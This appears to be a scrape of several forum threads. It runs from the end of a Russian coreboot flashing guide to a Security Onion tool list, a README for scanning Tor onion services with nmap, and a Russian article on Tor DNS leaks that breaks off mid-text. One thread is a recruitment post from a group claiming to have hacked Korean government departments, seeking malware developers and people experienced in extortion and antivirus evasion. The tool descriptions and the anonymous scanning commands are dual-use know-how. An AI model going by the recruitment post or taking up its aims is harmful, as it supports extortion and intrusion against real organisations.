Компилируем прошивку (CPUS=16 - число потоков)

Code:Copy to clipboard

make crossgcc-i386 CPUS=16 make

Необходимо разбить образ в 12MB на 2 образа по 8MB и 4MB

Code:Copy to clipboard

cd ~/coreboot/build dd if=coreboot.rom of=<название_образа_чипа_8MB_coreboot>.rom bs=1M count=8 dd if=coreboot.rom of=<название_образа_чипа_4MB_coreboot>.rom bs=1M skip=8

Снова присоеденяем программатор, считываем и прошивем оба чипа соотвествующими образами следующей командой(команду выполнить для обоих чипов):

Code:Copy to clipboard

sudo flashrom --programmer ch341a_spi -w <название_образа_чипа_coreboot>.rom

После этого собираем ноутбук и проверяем работоспособность, в моем случае, всё было отлично, и я увидел долгожданный значек coreboot на экране загрузки

Recruit members

ID: 676533bbb4103b69df371b12
Thread ID: 66873
Created: 2022-05-11T15:48:50+0000
Last Post: 2022-05-11T17:22:36+0000
Author: uteus
Replies: 2 Views: 254

We came from corecode, we hacked the Korean health department and defense department. We are now recruiting members. We need experienced malware developers. and red team personnel with extensive extortion experience. Ability to bypass anti-virus detection. If you are interested, you can privately message me on the forum and tell me your tg. Briefly introduce your own strengths and experience

Security Onion Services !

ID: 676533bbb4103b69df371a54
Thread ID: 89984
Created: 2023-06-08T09:29:33+0000
Last Post: 2023-06-08T09:29:33+0000
Author: whyban
Replies: 0 Views: 253

Security Onion would like to thank the following open-source projects for their contribution to our community!

Note

Please note that this is a combined list of tools for Security Onion 10.04 and Security Onion 12.04. Security Onion 12.04 has some new tools that weren't included in Security Onion 10.04 (like ELSA) and some tools have been removed (like Zenmap).

abcip

http://sourceforge.net/projects/abcip/
"A simple packet crafting tool that turns text commands into pcaps. Optionally build a DAQ and Snort can directly read commands or raw payload data - no pcap required. Packets can exhibit any flaw or anomaly desired. Syntax is flexible and powerful."

argus

http://www.qosient.com/argus/
"Argus is a data network transaction auditing tool that categorizes network packets that match the libpcap filter expression into a protocol-specific network flow transaction model. Argus reports on the transactions that it discovers, as periodic network flow data, that is suitable for historical and near real-time processing for forensics, trending and alarm/alerting."

barnyard2

http://www.securixlive.com/barnyard2/
"Barnyard2 is an open source interpreter for Snort unified2 binary output files. Its primary use is allowing Snort to write to disk in an efficient manner and leaving the task of parsing binary data into various formats to a separate process that will not cause Snort to miss network traffic."

bittwist

http://bittwist.sourceforge.net/
"Bit-Twist is a simple yet powerful libpcap-based Ethernet packet generator. It is designed to complement tcpdump, which by itself has done a great job at capturing network traffic."

Bro

http://bro-ids.org/
"Bro is a powerful network analysis framework that is much different from the typical IDS you may know."

chaosreader

http://chaosreader.sourceforge.net/
"Chaosreader is a freeware tool to fetch application data from snoop or tcpdump logs. Supported protocols include TCP, UDP, IPv4, IPv6, ICMP, telnet, FTP, HTTP, SMTP, IRC, X11, and VNC."

Daemonlogger

http://www.snort.org/snort-downloads/additional-downloads#daemonlogger
"Daemonlogger™ is a packet logger and soft tap developed by Martin Roesch."

driftnet

http://www.ex-parrot.com/~chris/driftnet/
"Driftnet is a program which listens to network traffic and picks out images from TCP streams it observes."

dsniff

http://www.monkey.org/~dugsong/dsniff/
"dsniff is a collection of tools for network auditing and penetration testing. dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.). arpspoof, dnsspoof, and macof facilitate the interception of network traffic normally unavailable to an attacker (e.g, due to layer-2 switching). sshmitm and webmitm implement active monkey-in-the-middle attacks against redirected SSH and HTTPS sessions by exploiting weak bindings in ad-hoc PKI."

Dumbpig

http://leonward.wordpress.com/dumbpig/
"Dumbpig is an automated bad-grammar[sik](https://github.com/Security-Onion- Solutions/security-onion/wiki/Tools/sik.md) detector for snort rules. It parses each rule in a file and reports on badly formatted entries, incorrect usage, and alerts to possible performance issues. It should be considered as work in progress and all users should only work with the latest code available."

ELSA

http://code.google.com/p/enterprise-log-search-and-archive/
"ELSA is a centralized syslog framework built on Syslog-NG, MySQL, and Sphinx full-text search. It provides a fully asynchronous web-based query interface that normalizes logs and makes searching billions of them for arbitrary strings as easy as searching the web. It also includes tools for assigning permissions for viewing the logs as well as email based alerts, scheduled queries, and graphing."

fwsnort

http://cipherdyne.org/fwsnort/
"fwsnort parses the rules files included in the SNORT ® intrusion detection system and builds an equivalent iptables ruleset for as many rules as possible. fwsnort utilizes the iptables string match module (together with a custom patch that adds a --hex-string option to the iptables user space code which is now integrated with iptables) to detect application level attacks."

Hogger

http://code.google.com/p/hogger/
"Hogger leverages nmap scan files to create a Host Attribute Table for you in the XML format that Snort needs to tune your pre-processors."

hping

http://www.hping.org/
"hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface is inspired to the ping(8) unix command, but hping isn't only able to send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files between a covered channel, and many other features."

httpry

http://dumpsterventures.com/jason/httpry/
"httpry is a specialized packet sniffer designed for displaying and logging HTTP traffic. It is not intended to perform analysis itself, but to capture, parse, and log the traffic for later analysis. It can be run in real-time displaying the traffic as it is parsed, or as a daemon process that logs to an output file. It is written to be as lightweight and flexible as possible, so that it can be easily adaptable to different applications."

hunt

"Advanced packet sniffer and connection intrusion. Hunt is a program for intruding into a connection, watching it and resetting it. Note that hunt is operating on Ethernet and is best used for connections which can be watched through it. However, it is possible to do something even for hosts on another segments or hosts that are on switched ports."

inundator

http://inundator.sourceforge.net/
"Inundator is a multi-threaded, queue-driven, anonymous intrusion detection false positives generator with support for multiple targets."

labrea

http://labrea.sourceforge.net/labrea-info.html
"LaBrea takes over unused IP addresses, and creates virtual servers that are attractive to worms, hackers, and other denizens of the Internet. The program answers connection attempts in such a way that the machine at the other end gets "stuck", sometimes for a very long time."

mergecap

http://www.wireshark.org/docs/man-pages/mergecap.html
"Mergecap is a program that combines multiple saved capture files into a single output file specified by the -w argument. Mergecap knows how to read libpcap capture files, including those of tcpdump, Wireshark, and other tools that write captures in that format."

ncat

http://nmap.org/ncat/
"Ncat is a feature-packed networking utility which reads and writes data across networks from the command line."

netsed

"The network packet altering stream editor NetSED is small and handful utility designed to alter the contents of packets forwarded thru your network in real time. It is really useful for network hackers in following applications: black-box protocol auditing - whenever there are two or more proprietary boxes communicating over undocumented protocol (by enforcing changes in ongoing transmissions, you will be able to test if tested application is secure), fuzz-alike experiments, integrity tests - whenever you want to test stability of the application and see how it ensures data integrity, other common applications - fooling other people, content filtering, etc etc - choose whatever you want to. It perfectly fits ngrep, netcat and tcpdump tools suite."

netsniff-ng

http://netsniff-ng.org/
"netsniff-ng is a free, performant Linux networking toolkit."

NetworkMiner

http://www.netresec.com/?page=NetworkMiner
"NetworkMiner is a Network Forensic Analysis Tool (NFAT) for Windows. NetworkMiner can be used as a passive network sniffer/packet capturing tool in order to detect operating systems, sessions, hostnames, open ports etc. without putting any traffic on the network. NetworkMiner can also parse PCAP files for off-line analysis and to regenerate/reassemble transmitted files and certificates from PCAP files."

nftracker

https://github.com/gamelinux/nftracker
"nftracker is a networks sniffing daemon that will read a pcap file or sniff a network interface and look for files that traverse your network. nftracker is session oriented, and will print out the files seen in a session."

ngrep

http://ngrep.sourceforge.net/
"ngrep strives to provide most of GNU grep's common features, applying them to the network layer. ngrep is a pcap-aware tool that will allow you to specify extended regular or hexadecimal expressions to match against data payloads of packets. It currently recognizes IPv4/6, TCP, UDP, ICMPv4/6, IGMP and Raw across Ethernet, PPP, SLIP, FDDI, Token Ring and null interfaces, and understands BPF filter logic in the same fashion as more common packet sniffing tools, such as tcpdump and snoop."

nmap

http://nmap.org/
"Nmap ("Network Mapper") is a free and open source (license) utility for network exploration or security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X. In addition to the classic command-line Nmap executable, the Nmap suite includes an advanced GUI and results viewer (Zenmap), a flexible data transfer, redirection, and debugging tool (Ncat), a utility for comparing scan results (Ndiff), and a packet generation and response analysis tool (Nping)."

oinkmaster

http://oinkmaster.sourceforge.net/
"Oinkmaster is a script that will help you update and manage your Snort rules. It is released under the BSD license and will work on most platforms that can run Perl scripts, e.g. Linux, BSD, Windows, Mac OS X, Solaris, etc. Oinkmaster can be used to update and manage the VRT licensed rules, the community rules, the bleeding-snort rules and other third party rules, including your own local rules."

OSSEC

http://www.ossec.net/
"OSSEC is an Open Source Host-based Intrusion Detection System. It performs log analysis, file integrity checking, policy monitoring, rootkit detection, real-time alerting and active response."

ostinato

http://code.google.com/p/ostinato/
"Ostinato is an open-source, cross-platform network packet crafter/traffic generator and analyzer with a friendly GUI. Craft and send packets of several streams with different protocols at different rates."

p0f

http://lcamtuf.coredump.cx/p0f3/
"P0f is a tool that utilizes an array of sophisticated, purely passive traffic fingerprinting mechanisms to identify the players behind any incidental TCP/IP communications (often as little as a single normal SYN) without interfering in any way. Version 3 is a complete rewrite of the original codebase, incorporating a significant number of improvements to network-level fingerprinting, and introducing the ability to reason about application-level payloads (e.g., HTTP)."

pcapcat

http://blog.kiddaland.net/dw/pcapcat
"This script reads a PCAP file and prints out all the connections in the file and gives the user the option of dumping the content of the TCP stream."

ptunnel

http://www.cs.uit.no/~daniels/PingTunnel/
"Ptunnel is an application that allows you to reliably tunnel TCP connections to a remote host using ICMP echo request and reply packets, commonly known as ping requests and replies. At first glance, this might seem like a rather useless thing to do, but it can actually come in handy in some cases."

Reassembler

http://isc.sans.edu/diary.html?storyid=13282
"If you provide reassembler.py with a pcap that contains fragments, it will reassemble the packets using each of the 5 reassembly engines and show you the result."

scapy

http://www.secdev.org/projects/scapy/
"Scapy is a powerful interactive packet manipulation program. It is able to forge or decode packets of a wide number of protocols, send them on the wire, capture them, match requests and replies, and much more. It can easily handle most classical tasks like scanning, tracerouting, probing, unit tests, attacks or network discovery (it can replace hping, 85% of nmap, arpspoof, arp-sk, arping, tcpdump, tethereal, p0f, etc.). It also performs very well at a lot of other specific tasks that most other tools can't handle, like sending invalid frames, injecting your own 802.11 frames, combining technics (VLAN hopping+ARP cache poisoning, VOIP decoding on WEP encrypted channel, ...), etc."

sguil

http://sguil.sourceforge.net/
"Sguil (pronounced sgweel) is built by network security analysts for network security analysts. Sguil's main component is an intuitive GUI that provides access to realtime events, session data, and raw packet captures. Sguil facilitates the practice of Network Security Monitoring and event driven analysis. The Sguil client is written in tcl/tk and can be run on any operating system that supports tcl/tk (including Linux, BSD, Solaris, MacOS, and Win32)."

Sniffit

http://sniffit.sourceforge.net/
"SniffIt is a Distribted Sniffer System, which allows users to capture network traffic from an unique machine using a graphical client application. This feature is very useful in switched networks, where traditional sniffers only allow users to sniff their own network traffic."

Snorby

http://snorby.org/
"Snorby is a ruby on rails web application for network security monitoring that interfaces with current popular intrusion detection systems (Snort, Suricata and Sagan). The basic fundamental concepts behind Snorby are simplicity, organization and power. The project goal is to create a free, open source and highly competitive application for network monitoring for both private and enterprise use."

Snort

http://www.snort.org/
"Snort® is an open source network intrusion prevention and detection system (IDS/IPS) developed by Sourcefire. Combining the benefits of signature, protocol, and anomaly-based inspection, Snort is the most widely deployed IDS/IPS technology worldwide. With millions of downloads and nearly 400,000 registered users, Snort has become the de facto standard for IPS."

SnortValidator

http://doc.emergingthreats.net/bin/view/Main/SnortValidator
"SnortValidator is a tool that analyzes snort rules and searches for certain syntactic and semantic errors. It aims to supplement Snort itself, which has a very weak error checking at some points. Hence, SnortValidator detects many things that Snort will silently accept, but that will for sure not work. Additionally, it detects some common semantic problems that indicate wrong usage of keywords that will certainly not do what you actually intended."

Squert

http://www.squertproject.org/
"Squert is a web application that is used to query and view event data stored in a Sguil database (typically IDS alert data). Squert is a visual tool that attempts to provide additional context to events through the use of metadata, time series representations and weighted and logically grouped result sets. The hope is that these views will prompt questions that otherwise may not have been asked."

ssldump

http://www.rtfm.com/ssldump/
"ssldump is an SSLv3/TLS network protocol analyzer. It identifies TCP connections on the chosen network interface and attempts to interpret them as SSLv3/TLS traffic. When it identifies SSLv3/TLS traffic, it decodes the records and displays them in a textual form to stdout. If provided with the appropriate keying material, it will also decrypt the connections and display the application data traffic."

sslsniff

http://www.thoughtcrime.org/software/sslsniff/
"sslsniff is designed to create man-in-the-middle (MITM) attacks for SSL/TLS connections, and dynamically generates certs for the domains that are being accessed on the fly. The new certificates are constructed in a certificate chain that is signed by any certificate that is provided. sslsniff also supports other attacks like null-prefix or OCSP attacks to achieve silent interceptions of connections when possible."

Suricata

http://www.openinfosecfoundation.org/index.php/download-suricata
"The Suricata Engine is an Open Source Next Generation Intrusion Detection and Prevention Engine. This engine is not intended to just replace or emulate the existing tools in the industry, but will bring new ideas and technologies to the field."

tcpdump

http://www.tcpdump.org/
"Tcpdump prints out a description of the contents of packets on a network interface that match the boolean expression. It can also be run with the -w flag, which causes it to save the packet data to a file for later analysis, and/or with the -r flag, which causes it to read from a saved packet file rather than to read packets from a network interface. In all cases, only packets that match expression will be processed by tcpdump."

tcpick

http://tcpick.sourceforge.net/
"tcpick is a textmode sniffer libpcap-based that can track, reassemble and reorder tcp streams. Tcpick is able to save the captured flows in different files or displays them in the terminal, and so it is useful to sniff files that are transmitted via ftp or http. It can display all the stream on the terminal, when the connection is closed in different display modes like hexdump, hexdump + ascii, only printable charachters, raw mode and so on. Available a color mode too, helpful to read and understand better the output of the program. Actually it can handle several interfaces, including ethernet cards and ppp. It is useful to keep track of what users of a network are doing, and is usable with textmode tools like grep, sed, awk."

tcpreplay

http://tcpreplay.synfin.net/
"Tcpreplay is a suite of GPLv3 licensed tools written by Aaron Turner for UNIX (and Win32 under Cygwin) operating systems which gives you the ability to use previously captured traffic in libpcap format to test a variety of network devices. It allows you to classify traffic as client or server, rewrite Layer 2, 3 and 4 headers and finally replay the traffic back onto the network and through other devices such as switches, routers, firewalls, NIDS and IPS's. Tcpreplay supports both single and dual NIC modes for testing both sniffing and inline devices."

tcpslice

http://sourceforge.net/projects/tcpslice/
"tcpslice is a tool for extracting portions of packet trace files generated using tcpdump's -w flag. It can combine multiple trace files, and/or extract portions of one or more traces based on time."

tcpstat

http://www.frenchfries.net/paul/tcpstat/
"tcpstat reports certain network interface statistics much like vmstat does for system statistics. tcpstat gets its information by either monitoring a specific interface, or by reading previously saved tcpdump data from a file."

tcpxtract

http://tcpxtract.sourceforge.net/
"tcpxtract is a tool for extracting files from network traffic based on file signatures."

traceroute-circl

https://github.com/CIRCL/traceroute-circl
"traceroute-circl is an extended traceroute to support the activities of CSIRT (or CERT) operators. Usually CSIRT team have to handle incidents based on IP addresses received."

tshark

http://www.wireshark.org/docs/man-pages/tshark.html
"TShark is a network protocol analyzer. It lets you capture packet data from a live network, or read packets from a previously saved capture file, either printing a decoded form of those packets to the standard output or writing the packets to a file. TShark's native capture file format is libpcap format, which is also the format used by tcpdump and various other tools."

u2boat

http://www.snort.org/
Part of Snort, u2boat converts unified2 files to pcaps.

u2spewfoo

http://www.snort.org/
Part of Snort, u2spewfoo converts unified2 files to text.

udptunnel

http://www.cs.columbia.edu/~lennox/udptunnel/
"UDPTunnel is a small program which can tunnel UDP packets bi-directionally over a TCP connection. Its primary purpose (and original motivation) is to allow multi-media conferences to traverse a firewall which allows only outgoing TCP connections."

Vortex

http://sourceforge.net/projects/vortex-ids/
"Vortex is a near real time IDS and network surveillance engine for TCP stream data. Vortex decouples packet capture, stream reassembly, and real time constraints from analysis. Vortex is used to provide TCP stream data to a separate analyzer program."

Wireshark

http://www.wireshark.org/
"Wireshark is a GUI network protocol analyzer. It lets you interactively browse packet data from a live network or from a previously saved capture file. Wireshark's native capture file format is libpcap format, which is also the format used by tcpdump and various other tools."

xpipes

http://sourceforge.net/projects/vortex-ids/
"Utilized by Vortex to facilitate highly parallel analysis. Xpipes borrows much of its philosophy (and name) from xargs. Like xargs it reads a list of data items (very often filenames) from STDIN and is usually used in conjunction with a pipe, taking input from another program. While xargs takes inputs and plops them in as arguments to another program, xpipes takes inputs and divides them between multiple pipes feeding other programs."

Xplico

http://www.xplico.org/
"The goal of Xplico is extract from an internet traffic capture the applications data contained. For example, from a pcap file Xplico extracts each email (POP, IMAP, and SMTP protocols), all HTTP contents, each VoIP call (SIP), FTP, TFTP, and so on. Xplico isn’t a network protocol analyzer. Xplico is an open source Network Forensic Analysis Tool (NFAT)."

xprobe2

http://xprobe.sourceforge.net/
"xprobe2 is an active operating system fingerprinting tool with a different approach to operating system fingerprinting. xprobe2 relies on fuzzy signature matching, probabilistic guesses, multiple matches simultaneously, and a signature database."

Zenmap

http://nmap.org/zenmap/
"Zenmap is the official Nmap Security Scanner GUI. It is a multi-platform (Linux, Windows, Mac OS X, BSD, etc.) free and open source application which aims to make Nmap easy for beginners to use while providing advanced features for experienced Nmap users."

docker-onion-nmap

Use nmap to scan hidden "onion" services on the Tor network. Minimal imagebased on alpine, using proxychains to wrap nmap. Tor and dnsmasq are runas daemons via s6, and proxychains wraps nmap to use the Tor SOCKS proxy on port 9050. Tor is also configured via DNSPort to anonymously resolve DNS requests to port 9053. dnsmasq is configured to with this localhost:9053 as an authority DNS server. Proxychains is configured to proxy DNS through the local resolver, so all DNS requests will go through Tor and applications can resolve .onion addresses.

Example:

$ docker run --rm -it milesrichardson/onion-nmap -p 80,443 facebookcorewwwi.onion
[tor_wait] Wait for Tor to boot... (might take a while)
[tor_wait] Done. Tor booted.
[nmap onion] nmap -p 80,443 facebookcorewwwi.onion
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/libproxychains4.so
[proxychains] DLL init: proxychains-ng 4.12

Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-23 16:17 UTC
[proxychains] Dynamic chain ... 127.0.0.1:9050 ... facebookcorewwwi.onion:443 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:9050 ... facebookcorewwwi.onion:80 ... OK
Nmap scan report for facebookcorewwwi.onion (224.0.0.1)
Host is up (2.7s latency).

PORT STATE SERVICE
80/tcp open http
443/tcp open https

Nmap done: 1 IP address (1 host up) scanned in 3.58 seconds

How it works:

When the container boots, it launches Tor and dnsmasq as daemons. The tor_waitscript then waits for the Tor SOCKS proxy to be up before executing your command.

Arguments:

By default, args to docker run are passed to [/bin/nmap](https://github.com/milesrichardson/docker-onion- nmap/blob/master/bin/nmap)which calls nmap with args -sT -PN -n "$@" necessary for it to work over Tor (via explainshell.com).

For example, this:

docker run --rm -it milesrichardson/onion-nmap -p 80,443 facebookcorewwwi.onion

will be executed as:

proxychains4 -f /etc/proxychains.conf /usr/bin/nmap -sT -PN -n -p 80,443 facebookcorewwwi.onion

In addition to the custom script for nmap, custom wrapper scripts for curland nc exist to wrap them in proxychains, at [/bin/curl](https://github.com/milesrichardson/docker-onion- nmap/blob/master/bin/curl)and [/bin/nc](https://github.com/milesrichardson/docker-onion- nmap/blob/master/bin/nc). To call them, simply specify curl or ncas the first argument to docker run. For example:

docker run --rm -it milesrichardson/onion-nmap nc -z 80 facebookcorewwwi.onion

will be executed as:

proxychains4 -f /etc/proxychains.conf /usr/bin/nc -z 80 facebookcorewwwi.onion

and

docker run --rm -it milesrichardson/onion-nmap curl -I https://facebookcorewwwi.onion

will be executed as:

proxychains4 -f /etc/proxychains.conf /usr/bin/curl -I https://facebookcorewwwi.onion

If you want to call any other command, including the original /usr/bin/nmap or/usr/bin/nc or /usr/bin/curl you can specify it as the first argument to docker run, e.g.:

docker run --rm -it milesrichardson/onion-nmap /usr/bin/curl -x socks4h://localhost:9050 https://facebookcorewwwi.onion

Environment variables:

There is only one environment variable: DEBUG_LEVEL. If you set it toanything other than 0, more debugging info will be printed (specifically,the attempted to connections to Tor while waiting for it to boot). Example:

$ docker run -e DEBUG_LEVEL=1 --rm -it milesrichardson/onion-nmap -p 80,443 facebookcorewwwi.onion
[tor_wait] Wait for Tor to boot... (might take a while)
[tor_wait retry 0] Check socket is open on localhost:9050...
[tor_wait retry 0] Socket OPEN on localhost:9050
[tor_wait retry 0] Check SOCKS proxy is up on localhost:9050 (timeout 2 )...
[tor_wait retry 0] SOCKS proxy DOWN on localhost:9050, try again...
[tor_wait retry 1] Check socket is open on localhost:9050...
[tor_wait retry 1] Socket OPEN on localhost:9050
[tor_wait retry 1] Check SOCKS proxy is up on localhost:9050 (timeout 4 )...
[tor_wait retry 1] SOCKS proxy DOWN on localhost:9050, try again...
[tor_wait retry 2] Check socket is open on localhost:9050...
[tor_wait retry 2] Socket OPEN on localhost:9050
[tor_wait retry 2] Check SOCKS proxy is up on localhost:9050 (timeout 6 )...
[tor_wait retry 2] SOCKS proxy UP on localhost:9050
[tor_wait] Done. Tor booted.
[nmap onion] nmap -p 80,443 facebookcorewwwi.onion
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/libproxychains4.so
[proxychains] DLL init: proxychains-ng 4.12

Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-23 16:34 UTC
[proxychains] Dynamic chain ... 127.0.0.1:9050 ... facebookcorewwwi.onion:443 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:9050 ... facebookcorewwwi.onion:80 ... OK
Nmap scan report for facebookcorewwwi.onion (224.0.0.1)
Host is up (2.8s latency).

PORT STATE SERVICE
80/tcp open http
443/tcp open https

Nmap done: 1 IP address (1 host up) scanned in 4.05 seconds

Notes:

No UDP available over Tor

Tor can take 10-20 seconds to boot. If this is untenable, another option is to run the proxy in its own container, or run it as the main process and then run "exec" to call commands like nmap

![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2F24292e72d7e0d7eebd3ccee5742d968e45bcf45ab9c2a1398bfdb78c175c84d0%2Fmilesrichardson%2Fdocker- onion-nmap&hash=9816e220dd50a887437673a942528fc2&return_error=1)

[ GitHub - milesrichardson/docker-onion-nmap: Scan .onion hidden services

with nmap using Tor, proxychains and dnsmasq in a minimal alpine Docker container. ](https://github.com/milesrichardson/docker-onion-nmap)

Scan .onion hidden services with nmap using Tor, proxychains and dnsmasq in a minimal alpine Docker container. - GitHub - milesrichardson/docker-onion-nmap: Scan .onion hidden services with nmap us...

github.com

Как работает DNS в Tor и почему попытки его улучшить сделают только хуже

ID: 676533bbb4103b69df371a43
Thread ID: 92317
Created: 2023-07-07T15:16:59+0000
Last Post: 2023-07-07T15:16:59+0000
Author: baykal
Prefix: Статья
Replies: 0 Views: 251

Как работает DNS в Tor и почему попытки его улучшить сделают только хуже

автор @torinmyheart
источник: rutor[.]wtf

Что такое DNS знаешь? Точно? Я всё же оставлю здесь это наглядное пояснение.

Spoiler: Наглядно что такое DNS

Очень упрощённо:

torproject.org| 116.202.120.166 (IP - точный адрес сервера в интернете)
---|---
gnu.org| 209.51.188.116
eff.org| 173.239.79.196

Это и есть DNS, элементарно. Такая таблица распределна по специальным серверам по всему миру, они называются DNS-сервера. Если вы пользуетесь обычным браузером, то DNS-сервер вам выбирает провайдер, либо вы сами, если заданы собственные настройки DNS.
На самом деле из этой схемы исключён целый слой - NS-сервера (иногда CDN). Этот слой имеет чисто техническую роль и совершенно не важен для понимания темы, поэтому я виртуально перекладываю функции NS на DNS и получаю красивое упрощённое объяснение.

§ 1 Как работает DNS в Tor, кто выбирает DNS-сервер?

§ 1 Когда DNS-сервер может вас деанонимизировать?

§ 1 Почему защита DNS в Tor сделает только хуже (и даже DNS over HTTPS [DoH] не поможет)?

§ 1 Почему успешно пройденный тест на утечку DNS не означает отсутствие утечек.

§ 2 Как узлы Tor могут атаковать вас, используя DNS и как от этого защититься?

§ 2 Как узлы Tor могут атаковать SSH и SFTP -соединения, в которых DNS вовсе не задействуется?

1. Прежде чем защищаться от атак, убедитесь, что вы используете Tor правильно!
Начинаем с фундаментального - утечка DNS. Но речь пойдёт не только о банальной утечке из браузера.

Важнейшее правило: когда вы используете Tor, ваши DNS-запросы тоже должны идти только через Tor.
Утечка DNS - это прямое "общение" вашего компьютера с DNS-сервером.

Деанонимизация по утечке DNS (с позиции государства):

Установить примерное время, когда объект слежки появился (зашёл) на тот или иной сайт. В этом поможет логирование активности, тот же онлайн на форумах или в мессенджерах.

Выяснить кто в это же время получал данные о соответствующих доменах с подконтрольных нам DNS-серверов.

Думаете, это не сработает, потому что диапазон времени может быть широким, а запросов в этот период может быть несколько? Ещё как сработает, потому что эту операцию можно повторять снова и снова, каждый раз накладывая полученные данные друг на друга, пока круг поиска не сузится до одного или нескольких человек.

Как найти утечку в браузере?
https://www.dnsleaktest.com
Если по результату вы не видите в таблице чего-то близкого к вашей стране или даже городу, значит утечки DNS в браузере, скорее всего, нет. Для надёжности несколько раз обновите цепочку и повторите тест, результаты должны отличаться.
Этот способ проверяет только браузер, но ведь DNS может "утекать" не только из браузера. Если вы так подумали, то вы правы. Но об этом чуть ниже.

Как устранить утечку в браузере?
Утечка DNS - это не болезнь, а симптом чего-то более серьёзного , поэтому прежде всего нужно выяснить первопричину. Утечка DNS в большинстве случаев говорит о том, что вы присрали Tor туда, где он быть не должен. Например, пустили обычный браузер через Tor по socks5. В этом случае может возникнуть и утечка обычных запросов, отпечатков браузера и железа, что уже намного опаснее, поэтому утечка DNS - это не единственная и не главная ваша проблема. Чтобы её исправить, нужно избавиться от хреновых решений и использовать полноценный Tor-браузер, а ещё лучше Whonix.

Если вы не видите утечку, это ещё не значит, что её нет
Задумывались о том, что, например, XMPP-клиент может допускать утечку, даже когда он настроен на прокси в Tor? Или любая другая программа, которая направляется в Tor через свою настройку socks-прокси? Аналогия про симптом здесь тоже работает. Программы могут допускать утечку и обычных запросов, а это уже совсем плохо. Выявить такую утечку слишком сложно. Анализ кода или анализ исходящего трафика не подходит, это всё долго, неэффективно, и придётся повторять после каждого обновления.
Причина проблемы в том, что любая программа свои внутренние настройки рассматривает как рекомендации. Она может строго им следовать, а может от них отступать, всё зависит от того, что разработчики понаписывали в коде. И чтобы надёжно решить проблему, нужно вынести перенаправление трафика за пределы программы. Туда, где она не сможет на это повлиять. Отбросив плохие практики (роутер в Tor, сомнительные скрипты с гитхаба), оставляю два пути решения:

Простой.torsocks . Если написать это перед командой запуска программы, она автоматически отправится в tor и не сможет из него случайно выбраться. Эта утилита есть в репозитории apt, утечку DNS она не допускает. Но такой способ нельзя считать очень надёжным, при определённых обстоятельствах он может подвести. Подойдёт только для простых (лучше даже разовых) задач, где высокий уровень надёжности не является критично важным.

Надёжный.Whonix. Это лучший вариант, запускать программы нужно внутри Workstation. Утечек он точно не допустит, к тому же имеет высокую защиту от человеческого фактора и случайных сбоев.

**2. Какого хера Tor сам выбирает для меня DNS?

Как это работает:**
В названии раздела уже дан ответ. Да, всё решает Tor. Точнее, выходная нода выбирает DNS по своему предпочтению. Новая цепочка - новая нода - новый DNS- сервер.

Как TorProject контролирует выбор DNS-серверов на выходных узлах Tor
А никак он его не контролирует. Выходные ноды не согласуют выбор DNS-сервера ни с вами, ни с TorProject, у которого нет никакого прямого влияния на этот процесс.
Для примера. Году так в 2018 TorProject обратили внимание, что из всех DNS- запросов в Tor на один только Google уходит 24%. Это централизация, которая всегда вредит конфиденциальности. Взялись TorProject за инструкции, публикации и документации, чтобы донести проблему до операторов выходных нод. Но кто-то что-то недопонял и в 2019 году вместо Google выросла доля Cloudflare, да так, что Google+Cloudflare стал занимать 31%.
Сейчас положительные успехи уже есть, но вы можете представить как тяжело они даются.
Продвигать DoT/DoH TorProject пока не собирается, потому что DNS-серверов с такой функцией мало и переход на них даст централизацию, от которой сейчас пытаются избавляться.
В результате DNS-запросы передаются в открытом виде и выходные ноды Tor имеют техническую возможность подменять данные и направлять вас по ложному IP.

Если вы хотите запретить Tor'у самодеятельность и прикрутить к нему свой собственный DoH, не спешите. Этим вы сделаете только хуже.

Что делать, если очень чешутся руки и хочется прикрутить DoH к Tor или Whonix
Подумать.
Технически это возможно. Сам Tor не позволяет настроить выбор DNS-сервера. Ни в браузере, ни в демоне (демон - служебная программа в linux) сделать это стандартными методами не получится. Этот факт уже должен наталкивать на мысль, что с идеей что-то не так.

В теории:
В Tor существуют опции CacheDNS и UseDNSCache (которые, кстати, сам Tor не рекомендует включать). Можно встроить в tor компонент, который будет выполнять DNS-запросы отдельно, а результат подсовывать в виде кэша.
На практике:

Ваше поведение в Tor будет нетипичным, оно отличит вас от большинства других пользователей, станет вашим личным маркером, что очень плохо для анонимности.

Выходная нода при желании всё равно может забить хер на полученый IP и перенаправить на какой-то другой.

От подмены IP на DNS-сервере вы никак не защищены.

Вы лишаетесь диверсификации DNS-среверов (новая цепочка - новый сервер) и вместо этого используете один единственный.

Поэтому единолично менять устройство DNS в Tor - это плохая идея.

Если вы используете браузер Firefox на Whonix, не включайте в нём DoH.

Всё, что здесь написано про DoH, актуально только в Tor! В обычном браузере, который общается с интернетом напрямую, наоборот следует включить DoH, в этом случае он будет полезен.

Так как же сделать DNS-запросы в Tor безопасными?

Для начала перестать пытаться сделать их опасными. Надеюсь, с этим разобрались.

Я кое-что пропустил в предыдущем разделе. Почему разработчики Tor рекомендуют не использовать опции типа UseDNSCache?
Опции помечены как "deprecated", а в документации сказано: This options ... can harm your anonymity (Эти опции .. могут навретить вашей анонимности)
Что плохого в кэшировании DNS?

По-умолчанию эта функция отключена, к тому же не рекомендована к использованию, значит среди пользователей Tor она встречается крайне редко. Такая опция даже без собственных доработок может стать отличным маркером. Не самым ярким, но всё же вашим личным маркером.

Кэш запросов не сбрасывается при обновлении цепочки. Отсюда две проблемы:

Если выходная нода попробует провернуть атаку с подменой DNS (которую подробно разберём позже), фейковый IP "прилипнет" к вашей системе и обновление цепочки не сбросит его. Это будет способствовать успешной атаке на вас. Так называемый, "липкий MITM".

